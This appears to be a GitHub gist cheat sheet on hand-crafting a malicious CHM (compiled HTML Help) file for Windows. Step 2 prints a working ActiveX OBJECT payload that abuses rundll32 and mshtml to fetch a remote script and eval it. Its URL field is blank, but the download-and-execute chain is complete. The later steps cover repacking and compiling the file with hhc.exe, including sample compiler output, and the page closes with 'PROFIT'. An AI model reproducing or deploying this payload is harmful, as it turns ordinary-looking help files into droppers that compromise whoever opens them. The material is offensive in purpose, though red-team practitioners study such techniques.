Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
  • Step 3: Prepare Project.hpp file with contents like the below ones:
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc

Add every file needed by that CHM to the FILES section. Remember to include also previously modified malicious HTM file.

  • Step 4: Compile the project within CHM directory using hpp.exe compiler:
<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Microsoft HTML Help Compiler 4.74.8702


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics

Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
  • Step 5: PROFIT.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.